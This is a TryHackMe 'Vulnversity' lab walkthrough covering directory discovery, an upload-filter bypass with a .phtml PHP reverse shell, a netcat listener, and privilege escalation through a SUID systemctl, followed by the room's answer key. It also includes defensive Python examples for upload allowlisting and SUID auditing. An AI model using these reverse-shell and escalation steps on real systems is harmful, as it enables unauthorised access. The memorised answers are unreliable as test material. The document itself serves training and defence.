TryHackMe - Vulnversity
If we go to http://10.10.72.158:3333/ we find a website, but its content is not really useful to us. Running gobuster against it is how we find the folder internal.
After a few tries with Burp, the accepted extension is phtml. You can also fuzz it with Burp Intruder and set a grep match on "extension not allowed" to see which extensions are accepted.
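The reason phtml slips through is the filter design: a denylist that names ".php" has to enumerate every extension the web server hands to the PHP interpreter, and phtml is easy to forget. The following is an added illustration written for this writeup, not the challenge's real upload code; the DENYLIST and ALLOWLIST contents are constructed. It shows a denylist check next to an allowlist check that also refuses double extensions and stores the file under a random name.

```python
import os
import re
import secrets

# Constructed denylist: deliberately incomplete, as such lists tend to be in practice.
DENYLIST = {".php", ".php5", ".phar"}
# Constructed allowlist: only what an image upload form actually needs.
ALLOWLIST = {".png", ".jpg", ".jpeg", ".gif"}


def denylist_check(filename):
    """Weak filter: reject only the extensions somebody remembered to list."""
    ext = os.path.splitext(filename)[1].lower()
    return ext not in DENYLIST


def allowlist_check(filename):
    """Hardened filter: accept only allowlisted extensions, on a name with exactly
    one extension, so 'a.png.phtml' and 'a.phtml.png' are both refused."""
    base = os.path.basename(filename)
    if base in ("", ".", "..") or base.startswith("."):
        return False
    parts = base.split(".")
    if len(parts) != 2:
        return False
    stem, ext = parts
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,64}", stem):
        return False
    return "." + ext.lower() in ALLOWLIST


def safe_storage_name(filename):
    """Return a random on-disk name (keeping the validated extension) or None.
    Discarding the client-supplied name removes path tricks from the equation;
    storing outside the web root is the other half of the mitigation."""
    if not allowlist_check(filename):
        return None
    ext = "." + os.path.basename(filename).rsplit(".", 1)[1].lower()
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    for name in ("shell.php", "php-reverse-shell.phtml", "photo.PNG", "photo.png.phtml"):
        print(f"{name:28} denylist={denylist_check(name)!s:5} allowlist={allowlist_check(name)}")
```

The denylist accepts the phtml file exactly as the writeup observes; the allowlist rejects it without needing to know anything about PHP's extension mapping.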
We copy the PHP reverse shell (preinstalled on Kali) and edit it: cp /usr/share/webshells/php/php-reverse-shell.php .
Then we rename it to the accepted extension: mv php-reverse-shell.php php-reverse-shell.phtml
We set up our listener: nc -lvp 4444
Now, as mentioned, we just need to browse to http://<ip>:3333/internal/uploads/php-reverse-shell.phtml to execute our shell (if this path had not been given, we could have run gobuster against the internal folder).
We get a shell as www-data
Now let's enumerate our options for privilege escalation:
find / -perm -u=s -type f 2>/dev/null
We have a few files with the SUID bit set.
Let's try the exploit.
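From the defender's side, the question "what file stands out?" is answered by comparing the find output against a baseline of SUID binaries expected on a clean install of the same release. The following is an added example for this writeup, not part of the original; the SAMPLE_FIND_OUTPUT and BASELINE contents are constructed, and a real baseline would be captured from a known-good image.

```python
import subprocess

# Constructed sample of what `find / -perm -u=s -type f 2>/dev/null` might print.
SAMPLE_FIND_OUTPUT = """\
/bin/mount
/bin/ping
/bin/su
/bin/umount
/bin/systemctl
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/newgrp
"""

# Constructed baseline of SUID paths expected on a stock install.
BASELINE = {
    "/bin/mount", "/bin/ping", "/bin/su", "/bin/umount",
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/newgrp", "/usr/bin/chsh",
}


def parse_suid_list(text):
    """Turn raw find output into a sorted, de-duplicated list of absolute paths."""
    return sorted({line.strip() for line in text.splitlines() if line.strip().startswith("/")})


def audit_suid(found, baseline):
    """Report SUID files not in the baseline (unexpected, e.g. a setuid systemctl)
    and baseline entries that are absent (possibly tampered or removed)."""
    found = set(found)
    return {
        "unexpected": sorted(found - baseline),
        "missing": sorted(baseline - found),
    }


def collect_live_suid():
    """Run the same find command the writeup uses on the local host."""
    proc = subprocess.run(
        ["find", "/", "-perm", "-u=s", "-type", "f"],
        capture_output=True, text=True, check=False,
    )
    return parse_suid_list(proc.stdout)


if __name__ == "__main__":
    report = audit_suid(parse_suid_list(SAMPLE_FIND_OUTPUT), BASELINE)
    for kind, paths in report.items():
        for path in paths:
            print(f"{kind:10} {path}")
```

On the sample data /bin/systemctl is the only unexpected entry, which matches the writeup's finding: systemctl is not SUID on a stock install, so a setuid copy is a configuration change worth alerting on.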
It stores the name of a temporary unit file in an environment variable and creates that temp file on the system as a service.
The service executes a command with /bin/sh (the GTFOBins entry runs id; in our case we can try to write the root flag to the output file). It then links the unit and enables it.
Here is our modified script
Once we have pasted all the commands above, we just need to cat /tmp/output and this will give us the root flag.
Scan the box, how many ports are open?
Answer 6
What version of the squid proxy is running on the machine?
Answer 3.5.12
How many ports will nmap scan if the flag -p-400 was used?
Answer 400
Using the nmap flag -n what will it not resolve?
Answer DNS
What is the most likely operating system this machine is running?
Answer Ubuntu
What port is the web server running on?
Answer 3333
What is the directory that has an upload form page?
Answer /internal/
Run this attack, what extension is allowed?
Answer phtml
What is the name of the user who manages the webserver?
Answer bill
What is the user flag?
I will let you do this on your own. Hint: cat /home/bill/user.txt
On the system, search for all SUID files. What file stands out?
Answer /bin/systemctl
Become root and get the last flag (/root/root.txt)
I will let you do this on your own. Hint: cat /root/root.txt
This is a page with file upload functionality. This is perfect for a reverse shell.
We have a GTFOBins entry for /bin/systemctl.